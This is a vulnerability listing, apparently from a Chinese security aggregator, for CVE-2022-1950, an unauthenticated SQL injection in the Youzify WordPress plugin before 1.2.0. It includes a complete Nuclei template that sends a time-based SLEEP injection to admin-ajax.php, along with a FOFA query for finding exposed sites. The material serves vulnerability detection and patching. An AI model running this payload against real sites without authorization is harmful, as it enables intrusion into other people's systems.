CVE-2022-1950: Youzify < 1.2.0 - Unauthenticated SQLi

日期: 2025-08-01 | 影响软件: Youzify | POC: 已公开

漏洞描述

The Youzify WordPress plugin before 1.2.0 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to an unauthenticated SQL injection

PoC代码[已公开]

id: CVE-2022-1950

info:
  name: Youzify < 1.2.0 - Unauthenticated SQLi
  author: DhiyaneshDK
  severity: critical
  description: |
    The Youzify WordPress plugin before 1.2.0 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to an unauthenticated SQL injection
  remediation: Fixed in 1.2.0
  reference:
    - https://wpscan.com/vulnerability/4352283f-dd43-4827-b417-0c55d0f4637d/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-1950
    cwe-id: CWE-89
    epss-score: 0.66086
    epss-percentile: 0.98473
    cpe: cpe:2.3:a:kainelabs:youzify:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: kainelabs
    product: youzify
    framework: wordpress
    fofa-query: body="/wp-content/plugins/youzify"
  tags: cve,cve2022,youzify,wp,wp-plugin,wordpress,sqli,time-based-sqli

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=youzify_media_pagination&data[type]=photos&page=1&data[group_id]=(SELECT 7958 FROM (SELECT(SLEEP(6)))XVfJ)

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 6'
          - 'contains(body, "youzify-media")'
          - 'status_code == 200'
        condition: and
# digest: 490a004630440220033cd2a707dbcab0b280c276082ac3dc422fb4e29c05bf98aa74de4e978bd818022077a42a324e8dc25b680f3df3caaf0c2075f054b250e1d5279ca3044826897b6e:922c64590222798bb761d5b6d8e72950